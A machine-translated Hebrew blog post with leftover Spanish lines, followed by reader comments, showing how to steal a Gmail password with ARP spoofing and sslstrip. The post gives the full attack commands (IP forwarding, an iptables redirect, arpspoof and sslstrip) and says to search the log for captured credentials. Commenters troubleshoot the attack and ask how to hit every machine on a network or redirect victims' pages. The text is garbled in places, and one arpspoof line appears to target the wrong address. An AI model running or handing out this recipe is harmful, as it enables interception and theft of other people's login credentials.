שלום בלוגרים.
להיום יש לי מדגם קטן של כמה מסוכן זה יכול להיות מחובר בכל רשת ללא אבטחה של כל כך הרבה מאיתנו אוהבים.
להיום אני הולך להשתמש ב- ArpSpoofing עם Sslstrip כדי לקבל סיסמת Gmail. כדי להפוך את הסביבה לשליטה יותר, יצרתי חשבון בשם "testarp@gmail.com".
ומכיוון שאני לא אוהב את ההקדמות, בואו נעבור לעניינים.
סביבה
למבחן זה מה שיש לנו הוא הבא:
1. תוקף: המחשב השולחני או המחשב השולחני שלי מכיל את דביאן וויזי. ממאגרים תוכלו להתקין סטריפ y dsniff להגיע לקבל זיוף ארפי
2. קורבן: הקורבן הוא טאבלט אנדרואיד שרוצה לראות רק את הדואר שלו דרך הדפדפן.
3. המדיום: האמצע הוא שלי נתב DPC2425 של סיסקו
כתובות.
כתובת התוקף: 172.26.0.2
כתובת הנתב: 172.26.0.1
כתובת הקורבן: 172.26.0.8
ההתקפה:
הדבר הראשון שנעשה למתקפה זו הוא להפעיל את הקדימה כדי שהמחשב שלנו יוכל להעביר את המידע לקורבן מבלי שהם מבינים זאת. (אחרת זו תהיה מתקפת מניעת שירותים)
לשם כך נשתמש:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
אז איך נקבל את מה שאנחנו רוצים?
בואו נכנס תחילה לדואר שלנו בטאבלט. במהלך הכניסה אנו רואים שאלפי ואלפי דברים מופיעים בקונסולה שלנו.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
עם Control + W אנו מחפשים משהו שנקרא SECURE POST.
ואנחנו נראה משהו כזה.
בין השורה הענקית שאי אפשר לראות אותה ניתן למצוא את הדוא"ל והסיסמה של הקורבן.
אז אנחנו רצים ימינה עד שלבסוף אנו רואים את האור בקצה המנהרה.
בהזדמנות אחרת נראה כיצד אנו יכולים להגן על עצמנו מעט מהתקפות אלה.
לגבי
אני מנצל הזדמנות זו כדי לומר שכאשר פורסם הפוסט, הפקודות לא היו נכונות.
בסוף הפקודה iptables חסר את 8080 שנמצא בשורה אחרת. ואז פקודות ה- arpspoof היו באותו קו. כל פקודה נמצאת בשורה אחרת.
אני מקווה שהעורך רואה את זה ויכול לתקן.
ברכות.
ביצעתי את התיקונים שאתה מזכיר, האם זה בסדר?
אם אתה מתכוון להכניס קוד לערך מועדף, השתמש בתצוגת HTML וודא שהמאמר תקין לפני שאתה שולח אותו לממתינים. תודה.
מצמרר לדעת שמי מאיתנו שאין לנו ידע כל כך פגיע. מידע טוב מאוד גם כשאני מבין מעט בנושא אני מבין את החשיבות. תודה!
לגבי
אבל זה עובד רק אם התוקף והקורבן נמצאים באותה רשת. בכל מקרה נראה לי שאם (בהיותך באותה רשת) אתה מתחבר באמצעות HTTPS זה לא קורה מכיוון שהנתונים מוצפנים לפני שעזבת את המחשב שלך. אם אתה מתחבר באמצעות HTTP (ללא S) אני חושב שאפילו מסתכל בכבל הרשת אתה רואה את המפתחות.
זה לא נכון. אני פורץ מפתח gmail ואם אתה מבחין ב- gmail משתמש ב- https. כך? העניין הוא שלמרות ש- https מאובטחת, זה תלוי ב- http. אז זה לא כל כך בטוח.
אל תתוודה כל כך הרבה על https ש- S לא מיועד לסופרמן זה בשביל "בטוח"
זה עובד עם או בלי https, ניסיתי את זה עם הפצת לינוקס מיוחדת יותר וזה עובד בלי בעיות
אתה יכול להשתמש בו במדויק כדי להעביר שיעור למי שגונב את ה- Wi-Fi שלך. 😀
זה פחות או יותר כמו שאמרו מזמן בבלוג של צ'מה אלונסו:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
אוסטיה, נהדר מה זה עושה! ואז הם אומרים לפרנואידי שלי בכל פעם שאני משתמש ב- VPN כשהם הולכים לבדוק את חשבון הבנק ...). אגב, אתה צריך לראות כמה אנשים ציניים בתגובות ... אם בסופו של דבר זה גונב ...
כעת עלינו לערוך הדרכה כיצד ליצור ולהציע שירות VPN משלך.
הסיפור שאתה מקשר הוא מעניין מאוד, אפילו נראה שהוא ראוי לספר רומן, וזה גורם לי לזכור מתי השתמשתי באינטרנט של שכני ולמרות שאני אומר שאני מכיר את הנושא, אני חושב שלעולם לא יכולתי לראות את הממדים האמיתיים של הסכנה שיכולתי להחזיק מעמד, למזלי, הם שינו את הסיסמה רק ל- WPA2 וכאן התחיל הסיפור שלי עם ספק שירותי האינטרנט haha
לכן הכותרת אומרת Sslstrip בפעולה.
זה עובד, כל עוד התוקף נמצא באמצע
איזה גל אתה עובד בפריזמה? -.-
לא.
מה אתה מחכה כדי לשלוח את בקשתך XD
דרישת שלום
פוסט טוב
מעניין, אני אעשה מבחן חינוכי אחר כך ... אולי אוכל אפילו להסיר את הסיסמה ל- WiFi וליהנות קצת 😛
בכל מקרה, האם אתה יכול לעשות משהו דומה כדי לשלוח דפים שונים לדפים שהיעד ביקש? למשל, הם רוצים לפתוח את פייסבוק ואני מפנה אותם לגוגל? 😛
כן. אבל הכל גליל שונה מאוד.
אולי אפרסם את זה אחר כך.
הודעה טובה מאוד, הנושאים האלה מאוד חינוכיים, ועכשיו אנחנו צריכים להיות מסוגלים להתמודד עם ההתקפה הזו, מכיוון שחלק (כמוני) מתחבר לרשתות ציבוריות (האוניברסיטה למשל) יהיה מועיל להימנע מכך.
ברכות!
זה לא עבד בשבילי 🙁
משהו לא מצליח לי כאן, מלבד העובדה שחיבורי https מוצפנים באמצעות אישור שרת (ברגע שיש לך את האישור במחשב שלך, הדפדפן שלך אחראי על ההצפנה) עם iptables אתה מפנה את יציאה 80 (http), ולא 443 , שזה https
גם אני חשבתי כך. העניין הוא שלמרות ש- https היא "מאובטחת", לרוע המזל זה תלוי ב- http. אז sslstrip מנצל זאת, זה גורם לדפדפן להאמין שהוא משתמש באישורי https אבל זה לא.
חרא קדוש! אבל הדפדפן אמור לראות אזהרה כמו "האישור הזה מגיע מאתר חשוד או משהו כזה" ... אני בהחלט אצטרך לעשות בדיקות XD
לא, שום דבר לא יוצא.
סוף סוף זה עבד בשבילי
אני מחובר ברשת WEP עם סיסמה, וזה הראה לי את הסיסמה בכל מקרה ישירות.
שאילתה. האם אתה יכול לעשות את אותו ההליך אך עבור כל המחשבים המחוברים לרשת, במקום שיהיה לך קורבן אחד?
כן אתה יכול. אבל לא עשיתי ניסויים. נסה זאת בעצמך וספר לנו מה שלומך.
הדבר היחיד שאני מקבל עם זה הוא שהמכונה של הקורבן יוצאת לא מקוונת, אבל ה- slslstrip לא מראה לי כלום: /
עליך להשבית את חומת האש לרגע. או לפחות לאפשר חיבורים נכנסים.
בדיקה ואני יכולנו לראות רק את שם המשתמש והסיסמה של דף הפייסבוק, ב- gmail לא מצאתי תוצאות ביומן, כמו כן הייתי זקוק רק לשורה של arpspoof «arpspoof -i -t«. מצד שני, מכונת הקורבן לא הצליחה לפתוח כמה עמודים. אמשיך בחקירה, זה מאוד מעניין. עזרה למי שמשתמש במנג'רו, החבילות להתקנה הן: dsniff (הנה arpspoff), מפותל ו- python2-pyopenssl. ניתן להוריד את Sslstrip מכאן: http://www.thoughtcrime.org/software/sslstrip/
כדי להריץ אותו $ python2 sslstrip.py
ברכות.
זה לא יצא אבל הקו arpspoof הוא: #arpspoof -i int -t ip-victim ip-router
תראה אני עושה בדיוק את מה שאתה אומר:
הד "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp-destination-port 80 -j REDIRECT -to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
הבעיה היא שהקורבן, שהוא מחשב אחר שיש לי כאן בחדר שלי, נותר ללא קשר לנקודה שעלי להפעיל מחדש את הנתב, מה אני יכול לעשות, לעזור לי.
דבר נוסף שאני עובד עם מכונה וירטואלית, וכשאני מבצע את הפקודה iwconfig, wlan0 לא מופיע, וגם כשאני מבצע ifconfig, אולם אם יש לי אינטרנט במחשב הווירטואלי שלי מה עם ממשק eth0.